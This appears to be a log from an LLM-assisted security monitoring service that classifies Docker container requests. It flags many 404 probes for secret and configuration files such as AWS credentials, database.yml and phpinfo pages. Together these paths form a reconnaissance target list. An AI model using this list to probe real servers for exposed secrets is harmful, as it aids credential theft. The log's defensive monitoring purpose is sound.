Mar 20 15:32:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:32:02.655544 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:32:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:32:07.084234 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:32:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:32:07.084272 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to credentials.yml under /config path returning 404 could indicate probing for sensitive files; not definitive exploitation but merits alerting. Line=2026-03-20T15:16:05.153293864Z GET /config/credentials.yml 404 0.606 ms - 9
Mar 20 15:32:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:32:11.328007 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 15:32:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:32:11.328054 [analyzer] Source hint mismatch: LLM says "docker_service_http", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:32:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:32:16.646697 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:32:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:32:16.646733 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=HTTP 404 on a webhook settings endpoint could indicate probing or misconfigured webhook path. Line=2026-03-20T15:16:05.258527171Z GET /webhooks/settings.json 404 0.799 ms - 9
Mar 20 15:32:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:32:20.529194 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.85 action=allow pattern_type=prefix
Mar 20 15:32:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:32:20.529242 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:32:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:32:27.092931 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:32:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:32:27.092968 [analyzer] Source hint mismatch: LLM says "http_server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:32:31.941345 [observer] Pipeline: processed=7314 pattern_hits=6675 llm_calls=639 llm_errors=3 learned=6
Mar 20 15:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:32:31.941371 [observer] Patterns: hash=6661 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=639
Mar 20 15:32:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:32:32.978649 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:32:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:32:32.978689 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=HTTP 404 on a CONFIG file path (parameters.yml) can indicate probing for sensitive config or misconfigured routes; not necessarily malicious but warrants scrutiny. Line=2026-03-20T15:16:05.349890092Z GET /app/config/parameters.yml 404 0.617 ms - 9
Mar 20 15:32:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:32:38.989629 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:32:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:32:38.989666 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=GET request to a potential configuration file path (config/parameters.yml) returning 404 may indicate probing for sensitive config data. Line=2026-03-20T15:16:05.373086472Z GET /config/parameters.yml 404 0.627 ms - 9
Mar 20 15:32:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:32:45.963764 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.68 action=alert pattern_type=
Mar 20 15:32:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:32:45.963797 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=404 for a sensitive-looking file (parameters.yml) suggests probing or accidental exposure; warrants monitoring but not definitive malicious activity. Line=2026-03-20T15:16:05.392127282Z GET /parameters.yml 404 0.787 ms - 9
Mar 20 15:32:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:32:51.527550 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:32:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:32:51.527588 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to a sensitive configuration file path (config/application.yml) handling a 404, which may indicate probing for config exposure. Line=2026-03-20T15:16:05.399371540Z GET /config/application.yml 404 0.529 ms - 9
Mar 20 15:32:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:32:56.281905 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:32:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:32:56.281946 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=HTTP GET to application.properties returning 404 can indicate probing for sensitive configuration files. Line=2026-03-20T15:16:05.409759209Z GET /application.properties 404 0.704 ms - 9
Mar 20 15:33:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:33:00.153544 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.76 action=allow pattern_type=prefix
Mar 20 15:33:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:33:00.153584 [analyzer] Source hint mismatch: LLM says "web_server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:33:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:33:02.073242 [observer] Pipeline: processed=7322 pattern_hits=6677 llm_calls=645 llm_errors=3 learned=6
Mar 20 15:33:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:33:02.075472 [observer] Patterns: hash=6663 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=645
Mar 20 15:33:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:33:06.646497 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:33:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:33:06.646536 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a sensitive path (/settings.py) resulting in 404 may indicate probing or information gathering. Line=2026-03-20T15:16:05.450870687Z GET /settings.py 404 0.835 ms - 9
Mar 20 15:33:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:33:11.081251 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 15:33:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:33:11.081295 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:33:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:33:18.600837 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:33:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:33:18.600875 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=404 on /config.inc could indicate an attempt to probe for sensitive configuration files or misconfigured paths Line=2026-03-20T15:16:05.594709652Z GET /config.inc 404 1.246 ms - 9
Mar 20 15:33:22 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:33:22.625512 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.92 action=allow pattern_type=prefix
Mar 20 15:33:22 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:33:22.625552 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:33:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:33:26.730603 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:33:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:33:26.730638 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to /config/database.yml returning 404 suggests potential probing for sensitive configuration files. Line=2026-03-20T15:16:05.625943850Z GET /config/database.yml 404 2.335 ms - 9
Mar 20 15:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:33:31.937956 [observer] Pipeline: processed=7331 pattern_hits=6681 llm_calls=650 llm_errors=3 learned=6
Mar 20 15:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:33:31.937983 [observer] Patterns: hash=6667 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=650
Mar 20 15:33:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:33:32.832383 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:33:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:33:32.832424 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:33:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:33:37.165457 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:33:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:33:37.165494 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to a backend config file (settings.yml) returning 404, which may indicate probing for sensitive paths. Not definitive malicious, but warrants alerting. Line=2026-03-20T15:16:05.641468273Z GET /backend/config/settings.yml 404 0.475 ms - 9
Mar 20 15:33:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:33:42.257117 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.58 action=alert pattern_type=
Mar 20 15:33:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:33:42.257189 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to serverless.yml could reveal configuration and is a potentially sensitive path being probed; not guaranteed malicious but warrants alerting. Line=2026-03-20T15:16:05.682662370Z GET /serverless.yml 404 1.995 ms - 9
Mar 20 15:33:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:33:50.332441 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:33:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:33:50.332473 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to /.aws/credentials path with a 404 status; indicates probing for sensitive credential file. Line=2026-03-20T15:16:05.731040709Z GET /.aws/credentials 404 0.648 ms - 9
Mar 20 15:33:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:33:54.592568 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:33:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:33:54.592624 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to a sensitive path /.aws/config resulting in 404 suggests probing for AWS config exposure. Not confirmed malicious, but warrants attention. Line=2026-03-20T15:16:05.733939362Z GET /.aws/config 404 0.468 ms - 9
Mar 20 15:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:01.105192 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:01.105236 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to /aws/credentials path commonly scanned for sensitive data exposure; 404 indicates not found but probing pattern is suspicious. Line=2026-03-20T15:16:05.738869003Z GET /aws/credentials 404 0.562 ms - 9
Mar 20 15:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:01.985957 [observer] Pipeline: processed=7341 pattern_hits=6685 llm_calls=656 llm_errors=3 learned=6
Mar 20 15:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:01.985993 [observer] Patterns: hash=6671 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=656
Mar 20 15:34:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:05.331780 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:34:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:05.331818 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request for a potentially sensitive file (aws-secret.yaml) resulting in 404; indicative of probing for secrets Line=2026-03-20T15:16:05.785360541Z GET /aws-secret.yaml 404 0.898 ms - 9
Mar 20 15:34:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:09.376917 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:34:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:09.376956 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to a hidden config file path (.circleci/config.yml) returning 404 — possible probing for sensitive files. Line=2026-03-20T15:16:05.786046156Z GET /.circleci/config.yml 404 1.472 ms - 9
Mar 20 15:34:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:13.535310 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 15:34:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:13.535347 [analyzer] Source hint mismatch: LLM says "web_server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:34:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:18.220371 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:34:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:18.220405 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access attempt to a sensitive/hidden file ( Pipelines config ) resulting in 404. Could indicate probing for config exposure. Line=2026-03-20T15:16:05.799442618Z GET /.bitbucket/pipelines.yml 404 0.566 ms - 9
Mar 20 15:34:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:21.421951 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:34:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:21.421991 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to /info.php returning 404 can indicate probing for server info or misconfiguration; not definitive but worth alerting. Line=2026-03-20T15:16:05.809232787Z GET /info.php 404 0.576 ms - 9
Mar 20 15:34:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:25.897644 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.58 action=alert pattern_type=
Mar 20 15:34:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:25.897684 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=HTTP 404 on a test PHP file may indicate probing or misconfiguration; not clearly malicious but warrants monitoring. Line=2026-03-20T15:16:05.869870920Z GET /test.php 404 0.593 ms - 9
Mar 20 15:34:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:30.369535 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:34:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:30.369579 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=404 for /phpinfo indicates a potential probing attempt for phpinfo exposure Line=2026-03-20T15:16:05.903527113Z GET /phpinfo 404 0.566 ms - 9
Mar 20 15:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:31.939242 [observer] Pipeline: processed=7352 pattern_hits=6689 llm_calls=663 llm_errors=3 learned=6
Mar 20 15:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:31.939265 [observer] Patterns: hash=6675 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=663
Mar 20 15:34:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:36.179947 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 15:34:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:36.179986 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to phpinfo.php often scans for PHP info disclosure; 404 indicates not found but probe-like pattern. Line=2026-03-20T15:16:05.904761928Z GET /phpinfo.php 404 0.430 ms - 9
Mar 20 15:34:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:42.479282 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:34:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:42.479319 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:34:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:46.070290 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:34:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:46.070330 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a profiler endpoint (/ _profiler/phpinfo) that is commonly probed; encountered a 404 which is not a successful hit but indicates potential reconnaissance. Line=2026-03-20T15:16:05.955566594Z GET /_profiler/phpinfo 404 0.555 ms - 9
Mar 20 15:34:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:52.025625 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.58 action=alert pattern_type=
Mar 20 15:34:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:52.025659 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Requesting Symfony profiler phpinfo endpoint (/app_dev.php/_profiler/phpinfo) which is commonly probed by attackers to discover debug tooling; a 404 indicates not present but still a potential probe. Line=2026-03-20T15:16:05.976893441Z GET /app_dev.php/_profiler/phpinfo 404 0.600 ms - 9
Mar 20 15:34:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:56.459004 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.68 action=allow pattern_type=prefix
Mar 20 15:34:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:34:56.459039 [analyzer] Source hint mismatch: LLM says "horizon", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:35:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:00.165494 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:35:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:00.165536 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to /_profiler/latest endpoint is commonly targeted by probing or misconfig attempts; HTTP 404 on this path is a potential information-gathering probe. Line=2026-03-20T15:16:05.991503718Z GET /_profiler/latest 404 0.433 ms - 9
Mar 20 15:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:01.969308 [observer] Pipeline: processed=7360 pattern_hits=6691 llm_calls=669 llm_errors=3 learned=6
Mar 20 15:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:01.969339 [observer] Patterns: hash=6677 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=669
Mar 20 15:35:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:05.087688 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.58 action=alert pattern_type=
Mar 20 15:35:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:05.087728 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=HTTP 404 indicates missing resource; not necessarily malicious, but could indicate misconfiguration or probing. Line=2026-03-20T15:16:06.012447665Z GET /manage/env 404 0.558 ms - 9
Mar 20 15:35:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:09.607944 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 15:35:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:09.607983 [analyzer] Source hint mismatch: LLM says "nginx_http", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:35:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:14.004532 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 15:35:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:14.004570 [analyzer] Source hint mismatch: LLM says "tc_qos", actual is "captain-netdata-container" — skipping pattern
Mar 20 15:35:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:15.771260 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:35:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:15.771303 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:35:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:20.242097 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: LLM returned 520: error code: 520
Mar 20 15:35:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:20.242153 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-20T15:16:06.108764513Z GET /server-info 404 0.604 ms - 9
Mar 20 15:35:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:21.008736 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 15:35:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:21.008774 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 15:35:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:25.066252 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:35:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:25.066306 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:35:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:28.006652 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 15:35:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:28.006689 [analyzer] Confidence 0.72 too low for pattern learning (need 0.85+)
Mar 20 15:35:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:28.824638 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:35:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:28.824682 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Unusual request to a log file path returning 404, suggesting possible probing or misconfigured client attempting to access internal resources. Line=2026-03-20T15:16:06.114953394Z GET /storage/logs/laravel.log 404 0.551 ms - 9
Mar 20 15:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:31.938045 [observer] Pipeline: processed=7371 pattern_hits=6693 llm_calls=678 llm_errors=4 learned=6
Mar 20 15:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:31.938073 [observer] Patterns: hash=6679 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=678
Mar 20 15:35:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:32.643852 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:35:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:32.643890 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:35:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:36.329473 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 15:35:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:36.329511 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:35:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:39.105396 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.85 action=allow pattern_type=prefix
Mar 20 15:35:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:35:39.105434 [analyzer] Source hint mismatch: LLM says "nginx/http_server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:36:01.972880 [observer] Pipeline: processed=7377 pattern_hits=6697 llm_calls=680 llm_errors=4 learned=6
Mar 20 15:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:36:01.972913 [observer] Patterns: hash=6683 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=680
Mar 20 15:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:36:31.938092 [observer] Pipeline: processed=7379 pattern_hits=6699 llm_calls=680 llm_errors=4 learned=6
Mar 20 15:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:36:31.938174 [observer] Patterns: hash=6685 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=680
Mar 20 15:37:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:37:02.051541 [observer] Pipeline: processed=7383 pattern_hits=6703 llm_calls=680 llm_errors=4 learned=6
Mar 20 15:37:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:37:02.051575 [observer] Patterns: hash=6689 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=680
